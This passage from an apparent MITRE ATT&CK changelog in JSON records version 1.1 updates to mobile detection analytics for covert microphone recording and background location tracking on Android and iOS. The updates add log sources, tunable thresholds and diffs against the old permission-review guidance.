                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"ExpectedAudioAppsBaseline\", \"description\": \"Allow-list of legitimate applications expected to record audio on the device.\"}, {\"field\": \"BackgroundWakeCorrelationWindow\", \"description\": \"Time window correlating background wake events with microphone activation.\"}, {\"field\": \"MicSessionDurationThreshold\", \"description\": \"Minimum microphone recording duration considered suspicious.\"}, {\"field\": \"MicToNetworkCorrelationWindow\", \"description\": \"Time window linking microphone activation to outbound network activity.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Threshold for outbound traffic volume indicating possible audio upload.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-04 23:33:56.647000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender observes an application with declared microphone capability initiating microphone resource use through iOS audio frameworks, potentially during background execution or shortly after a silent wake event, followed by sustained audio capture and outbound encrypted traffic suggesting audio streaming or upload activity.\", \"old_value\": \"In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)\\n\\n\\nIn Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators)\\nAndroid applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized.\\n\\nIn both Android (6.0 and up) and iOS, the user can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary. \", \"diff\": \"--- \\n+++ \\n@@ -1,7 +1 @@\\n-In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)\\n-\\n-\\n-In Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators)\\n-Android applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized.\\n-\\n-In both Android (6.0 and up) and iOS, the user can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary. \\n+A defender observes an application with declared microphone capability initiating microphone resource use through iOS audio frameworks, potentially during background execution or shortly after a silent wake event, followed by sustained audio capture and outbound encrypted traffic suggesting audio streaming or upload activity.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Microphone sensor activation or audio recording session initiated by application process\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes audio buffer or recorded audio file into application storage directories\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application transitions to background or executes while screen locked during microphone session\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Application installed with NSMicrophoneUsageDescription entitlement indicating microphone capability\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Android Privacy Indicators\", \"description\": \"Google. (n.d.). Privacy Indicators. Retrieved April 20, 2022.\", \"url\": \"https://source.android.com/devices/tech/config/privacy-indicators\"}, \"root['external_references'][2]\": {\"source_name\": \"iOS Mic Spyware\", \"description\": \"ZecOps Research Team. (2021, November 4). How iOS Malware Can Spy on Users Silently. Retrieved April 1, 2022.\", \"url\": \"https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to106__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to106__0\"><a href=\"#difflib_chg_to106__top\">t</a></td><td class=\"diff_header\" id=\"from106_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">In&nbsp;iOS&nbsp;14&nbsp;and&nbsp;up,&nbsp;an&nbsp;orange&nbsp;dot&nbsp;(or&nbsp;orange&nbsp;square&nbsp;if&nbsp;the&nbsp;Dif</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to106__top\">t</a></td><td class=\"diff_header\" id=\"to106_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;observes&nbsp;an&nbsp;application&nbsp;with&nbsp;declared&nbsp;microphone&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ferentiate&nbsp;Without&nbsp;Color&nbsp;setting&nbsp;is&nbsp;enabled)&nbsp;appears&nbsp;in&nbsp;the&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">capability&nbsp;initiating&nbsp;microphone&nbsp;resource&nbsp;use&nbsp;through&nbsp;iOS&nbsp;au</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">status&nbsp;bar&nbsp;when&nbsp;the&nbsp;microphone&nbsp;is&nbsp;being&nbsp;used&nbsp;by&nbsp;an&nbsp;applicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">dio&nbsp;frameworks,&nbsp;potentially&nbsp;during&nbsp;background&nbsp;execution&nbsp;or&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on.&nbsp;However,&nbsp;there&nbsp;have&nbsp;been&nbsp;demonstrations&nbsp;indicating&nbsp;it&nbsp;ma</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hortly&nbsp;after&nbsp;a&nbsp;silent&nbsp;wake&nbsp;event,&nbsp;followed&nbsp;by&nbsp;sustained&nbsp;audi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">y&nbsp;still&nbsp;be&nbsp;possible&nbsp;to&nbsp;access&nbsp;the&nbsp;microphone&nbsp;in&nbsp;the&nbsp;backgrou</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">o&nbsp;capture&nbsp;and&nbsp;outbound&nbsp;encrypted&nbsp;traffic&nbsp;suggesting&nbsp;audio&nbsp;st</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;without&nbsp;triggering&nbsp;this&nbsp;visual&nbsp;indicator&nbsp;by&nbsp;abusing&nbsp;featu</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">reaming&nbsp;or&nbsp;upload&nbsp;activity.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">res&nbsp;that&nbsp;natively&nbsp;access&nbsp;the&nbsp;microphone&nbsp;or&nbsp;camera&nbsp;but&nbsp;do&nbsp;not</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;trigger&nbsp;the&nbsp;visual&nbsp;indicators.(Citation:&nbsp;iOS&nbsp;Mic&nbsp;Spyware)&nbsp;&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;In&nbsp;Android&nbsp;12&nbsp;and&nbsp;up,&nbsp;a&nbsp;green&nbsp;dot&nbsp;appears&nbsp;in&nbsp;the&nbsp;status&nbsp;bar</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;when&nbsp;the&nbsp;microphone&nbsp;is&nbsp;being&nbsp;used&nbsp;by&nbsp;an&nbsp;application.(Citati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on:&nbsp;Android&nbsp;Privacy&nbsp;Indicators)&nbsp;Android&nbsp;applications&nbsp;using&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">he&nbsp;`RECORD_AUDIO`&nbsp;permission&nbsp;and&nbsp;iOS&nbsp;applications&nbsp;using&nbsp;`Req</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">uestRecordPermission`&nbsp;should&nbsp;be&nbsp;carefully&nbsp;reviewed&nbsp;and&nbsp;monit</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ored.&nbsp;If&nbsp;the&nbsp;`CAPTURE_AUDIO_OUTPUT`&nbsp;permission&nbsp;is&nbsp;found&nbsp;in&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;third-party&nbsp;Android&nbsp;application,&nbsp;the&nbsp;application&nbsp;should&nbsp;be&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">heavily&nbsp;scrutinized.&nbsp;&nbsp;In&nbsp;both&nbsp;Android&nbsp;(6.0&nbsp;and&nbsp;up)&nbsp;and&nbsp;iOS,&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">the&nbsp;user&nbsp;can&nbsp;review&nbsp;which&nbsp;applications&nbsp;have&nbsp;the&nbsp;permission&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">o&nbsp;access&nbsp;the&nbsp;microphone&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nd&nbsp;revoke&nbsp;permissions&nbsp;as&nbsp;necessary.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--83b759ca-097c-4d9f-926b-fb41e0740644",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-04 23:46:03.218000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0675#AN1776",
                            "external_id": "AN1776"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1776",
                    "description": "Defender correlates an application gaining/retaining fine or background location capability with subsequent location sensor sessions that occur while the app is backgrounded or the device is locked, followed by repeated location reads at a periodic cadence and near-term outbound connections to domains not typical for fleet navigation/MDM services, indicating covert location tracking.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "EDR:telemetry",
                            "channel": "Sustained or high-frequency location sensor access, including background location usage"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Application granted/retaining ACCESS_FINE_LOCATION and/or ACCESS_COARSE_LOCATION; background location capability present (ACCESS_BACKGROUND_LOCATION on Android 10+)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "LocationSamplingFrequencyThreshold",
                            "description": "Defines acceptable rate of location queries before triggering anomaly conditions"
                        },
                        {
                            "field": "BackgroundLocationPolicy",
                            "description": "Baseline of legitimate background location usage across applications"
                        },
                        {
                            "field": "LocationToNetworkTimeWindow",
                            "description": "Temporal linkage between location access and outbound traffic"
                        },
                        {
                            "field": "UserInteractionWindow",
                            "description": "Maximum time since last user interaction before location access becomes suspicious."
                        },
                        {
                            "field": "AllowedLocationApps",
                            "description": "Allow-list of expected location-heavy apps (maps, rideshare, fleet apps) for the enterprise device population"
                        },
                        {
                            "field": "DevicePolicySensitivity",
                            "description": "Tuning for how aggressively to treat background location permission as risky depending on org policy."
                        },
                        {
                            "field": "AllowedDestinationsBaseline",
                            "description": "Baseline of expected domains/IPs for legitimate location services (OEM, mapping SDKs, MDM endpoints) to reduce false positives."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"LocationSamplingFrequencyThreshold\", \"description\": \"Defines acceptable rate of location queries before triggering anomaly conditions\"}, {\"field\": \"BackgroundLocationPolicy\", \"description\": \"Baseline of legitimate background location usage across applications\"}, {\"field\": \"LocationToNetworkTimeWindow\", \"description\": \"Temporal linkage between location access and outbound traffic\"}, {\"field\": \"UserInteractionWindow\", \"description\": \"Maximum time since last user interaction before location access becomes suspicious.\"}, {\"field\": \"AllowedLocationApps\", \"description\": \"Allow-list of expected location-heavy apps (maps, rideshare, fleet apps) for the enterprise device population\"}, {\"field\": \"DevicePolicySensitivity\", \"description\": \"Tuning for how aggressively to treat background location permission as risky depending on org policy.\"}, {\"field\": \"AllowedDestinationsBaseline\", \"description\": \"Baseline of expected domains/IPs for legitimate location services (OEM, mapping SDKs, MDM endpoints) to reduce false positives.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-04 23:46:03.218000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an application gaining/retaining fine or background location capability with subsequent location sensor sessions that occur while the app is backgrounded or the device is locked, followed by repeated location reads at a periodic cadence and near-term outbound connections to domains not typical for fleet navigation/MDM services, indicating covert location tracking.\", \"old_value\": \"In both Android (6.0 and up) and iOS, the user can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. \\nAndroid applications requesting the `ACCESS_COARSE_LOCATION`, `ACCESS_FINE_LOCATION`, or `ACCESS_BACKGROUND_LOCATION` permissions and iOS applications including the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file could be scrutinized during the application vetting process. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-In both Android (6.0 and up) and iOS, the user can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. \\n-Android applications requesting the `ACCESS_COARSE_LOCATION`, `ACCESS_FINE_LOCATION`, or `ACCESS_BACKGROUND_LOCATION` permissions and iOS applications including the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file could be scrutinized during the application vetting process. \\n+Defender correlates an application gaining/retaining fine or background location capability with subsequent location sensor sessions that occur while the app is backgrounded or the device is locked, followed by repeated location reads at a periodic cadence and near-term outbound connections to domains not typical for fleet navigation/MDM services, indicating covert location tracking.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"EDR:telemetry\", \"channel\": \"Sustained or high-frequency location sensor access, including background location usage\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Application granted/retaining ACCESS_FINE_LOCATION and/or ACCESS_COARSE_LOCATION; background location capability present (ACCESS_BACKGROUND_LOCATION on Android 10+)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to108__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to108__0\"><a href=\"#difflib_chg_to108__top\">t</a></td><td class=\"diff_header\" id=\"from108_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">In&nbsp;both&nbsp;Android&nbsp;(6.0&nbsp;and&nbsp;up)&nbsp;and&nbsp;iOS,&nbsp;the&nbsp;user&nbsp;can&nbsp;view&nbsp;whic</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to108__top\">t</a></td><td class=\"diff_header\" id=\"to108_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;application&nbsp;gaining/retaining&nbsp;fine&nbsp;or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">h&nbsp;applications&nbsp;have&nbsp;the&nbsp;permission&nbsp;to&nbsp;access&nbsp;the&nbsp;device&nbsp;loca</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;background&nbsp;location&nbsp;capability&nbsp;with&nbsp;subsequent&nbsp;location&nbsp;sen</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen&nbsp;and&nbsp;revoke&nbsp;permissio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sor&nbsp;sessions&nbsp;that&nbsp;occur&nbsp;while&nbsp;the&nbsp;app&nbsp;is&nbsp;backgrounded&nbsp;or&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;as&nbsp;necessary.&nbsp;&nbsp;Android&nbsp;applications&nbsp;requesting&nbsp;the&nbsp;`ACCES</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;device&nbsp;is&nbsp;locked,&nbsp;followed&nbsp;by&nbsp;repeated&nbsp;location&nbsp;reads&nbsp;at&nbsp;a&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">S_COARSE_LOCATION`,&nbsp;`ACCESS_FINE_LOCATION`,&nbsp;or&nbsp;`ACCESS_BACKG</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">periodic&nbsp;cadence&nbsp;and&nbsp;near-term&nbsp;outbound&nbsp;connections&nbsp;to&nbsp;domai</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ROUND_LOCATION`&nbsp;permissions&nbsp;and&nbsp;iOS&nbsp;applications&nbsp;including&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ns&nbsp;not&nbsp;typical&nbsp;for&nbsp;fleet&nbsp;navigation/MDM&nbsp;services,&nbsp;indicating</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">he&nbsp;`NSLocationWhenInUseUsageDescription`,&nbsp;`NSLocationAlwaysA</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;covert&nbsp;location&nbsp;tracking.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ndWhenInUseUsageDescription`,&nbsp;and/or&nbsp;`NSLocationAlwaysUsageD</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">escription`&nbsp;keys&nbsp;in&nbsp;their&nbsp;`Info.plist`&nbsp;file&nbsp;could&nbsp;be&nbsp;scrutin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ized&nbsp;during&nbsp;the&nbsp;application&nbsp;vetting&nbsp;process.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f34fef81-f714-4e26-ae99-3c970959cd0d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-04 23:47:29.735000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0675#AN1777",
                            "external_id": "AN1777"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1777",
                    "description": "Defender correlates an application\u2019s location authorization level (When-In-Use vs Always) and entitlement posture with observed location sensor activity that occurs without proximate user interaction, including background updates, followed by periodic outbound network sessions aligned to location update timing\u2014suggesting covert or policy-violating location tracking.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Application activates CoreLocation services or CLLocationManager APIs"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "App installed with location usage declarations (WhenInUse/Always usage description) and granted authorization level via managed policy state"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ForegroundLocationExpectation",
                            "description": "Defines legitimate location usage relative to app state"
                        },
                        {
                            "field": "LocationAccessDurationThreshold",
                            "description": "Baseline deviation tolerance for sustained location tracking"
                        },
                        {
                            "field": "LocationToTransmissionWindow",
                            "description": "Temporal threshold linking location access to network activity"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"ForegroundLocationExpectation\", \"description\": \"Defines legitimate location usage relative to app state\"}, {\"field\": \"LocationAccessDurationThreshold\", \"description\": \"Baseline deviation tolerance for sustained location tracking\"}, {\"field\": \"LocationToTransmissionWindow\", \"description\": \"Temporal threshold linking location access to network activity\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-04 23:47:29.735000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an application\\u2019s location authorization level (When-In-Use vs Always) and entitlement posture with observed location sensor activity that occurs without proximate user interaction, including background updates, followed by periodic outbound network sessions aligned to location update timing\\u2014suggesting covert or policy-violating location tracking.\", \"old_value\": \"In both Android (6.0 and up) and iOS, the user can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. \\nAndroid applications requesting the `ACCESS_COARSE_LOCATION`, `ACCESS_FINE_LOCATION`, or `ACCESS_BACKGROUND_LOCATION` permissions and iOS applications including the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file could be scrutinized during the application vetting process. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-In both Android (6.0 and up) and iOS, the user can 